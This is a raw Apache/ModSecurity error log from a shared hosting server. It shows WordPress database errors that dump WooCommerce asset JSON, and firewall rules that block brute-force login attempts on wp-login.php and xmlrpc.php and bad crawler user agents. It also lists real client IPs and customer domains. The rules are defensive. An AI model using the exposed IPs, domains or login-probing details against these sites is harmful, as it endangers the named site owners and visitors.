ry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.777716 2026] [lsapi:warn] [pid 817651:tid 817807] [client 45.13.225.123:33120] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.779368 2026] [lsapi:warn] [pid 817651:tid 817807] [client 45.13.225.123:33120] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.984589 2026] [security2:error] [pid 817651:tid 817880] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBmNlGRCPPN1dS2y27DQAAAOg"]
[Tue May 26 16:48:50.419834 2026] [security2:error] [pid 823496:tid 823692] [client 185.191.171.6:28276] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWBmpa08mrtyBNpA4Pb2gAAAEA"]
[Tue May 26 16:48:50.419982 2026] [security2:error] [pid 823496:tid 823692] [client 185.191.171.6:28276] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWBmpa08mrtyBNpA4Pb2gAAAEA"]
[Tue May 26 16:48:50.797721 2026] [security2:error] [pid 817651:tid 817813] [client 173.239.254.123:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWBmdlGRCPPN1dS2y27HwAApWg"]
[Tue May 26 16:48:52.570791 2026] [security2:error] [pid 823496:tid 823752] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBm5a08mrtyBNpA4Pb5QAAAHw"]
[Tue May 26 16:48:54.231462 2026] [security2:error] [pid 823496:tid 823747] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBnJa08mrtyBNpA4Pb9AAAAHc"]
[Tue May 26 16:48:55.155797 2026] [security2:error] [pid 823496:tid 823680] [client 193.37.33.136:43497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWBnpa08mrtyBNpA4PcFwAAADQ"]
[Tue May 26 16:48:56.147996 2026] [core:error] [pid 823496:tid 823645] [client 5.255.99.53:36568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:56.148029 2026] [core:error] [pid 823496:tid 823645] [client 5.255.99.53:36568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:56.254527 2026] [security2:error] [pid 823496:tid 823682] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBnpa08mrtyBNpA4PcFQAAADY"]
[Tue May 26 16:48:58.161911 2026] [security2:error] [pid 817651:tid 817887] [client 77.221.152.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBoNlGRCPPN1dS2y27eAAAAO8"]
[Tue May 26 16:48:58.198770 2026] [core:error] [pid 823496:tid 823736] [client 5.255.99.53:40696] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:58.198800 2026] [core:error] [pid 823496:tid 823736] [client 5.255.99.53:40696] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:58.544313 2026] [security2:error] [pid 823496:tid 823679] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBoJa08mrtyBNpA4PcLQAAADM"]
[Tue May 26 16:48:58.682817 2026] [security2:error] [pid 823496:tid 823686] [client 104.219.236.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBopa08mrtyBNpA4PcPgAAADo"], referer: https://www.anujtradingco.com/
[Tue May 26 16:48:59.232878 2026] [security2:error] [pid 823496:tid 823706] [client 104.219.236.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBo5a08mrtyBNpA4PcRQAAAE4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1430893&moderation-hash=336e5499fbddf823815df3a0e5a22c7e
[Tue May 26 16:48:59.936197 2026] [security2:error] [pid 817651:tid 817905] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBotlGRCPPN1dS2y27hQAAAQE"]
[Tue May 26 16:49:00.137069 2026] [security2:error] [pid 817651:tid 817885] [client 117.198.37.168:51042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBpNlGRCPPN1dS2y27mwAAAO0"]
[Tue May 26 16:49:00.137195 2026] [security2:error] [pid 817651:tid 817885] [client 117.198.37.168:51042] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBpNlGRCPPN1dS2y27mwAAAO0"]
[Tue May 26 16:49:00.224552 2026] [security2:error] [pid 817651:tid 817868] [client 23.158.233.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBpNlGRCPPN1dS2y27ngAAANw"], referer: https://www.anujtradingco.com/
[Tue May 26 16:49:00.566458 2026] [security2:error] [pid 817651:tid 817785] [client 23.158.233.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBpNlGRCPPN1dS2y27qQAAAIk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1214483&moderation-hash=5d194e09e414f38a8df24c8b6e96d059
[Tue May 26 16:49:02.054691 2026] [security2:error] [pid 817651:tid 817835] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBpNlGRCPPN1dS2y27rAAAALs"]
[Tue May 26 16:49:04.505465 2026] [security2:error] [pid 817651:tid 817800] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBp9lGRCPPN1dS2y271AAAAJg"]
[Tue May 26 16:49:05.377139 2026] [security2:error] [pid 823496:tid 823686] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBqJa08mrtyBNpA4PcaAAAADo"]
[Tue May 26 16:49:07.646503 2026] [security2:error] [pid 817651:tid 817891] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBqtlGRCPPN1dS2y27_wAAAPM"]
[Tue May 26 16:49:08.646979 2026] [security2:error] [pid 823496:tid 823702] [client 173.239.211.249:22441] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "panda-eco.com"] [uri "/wp-login.php"] [unique_id "ahWBq5a08mrtyBNpA4PchgAAAEo"]
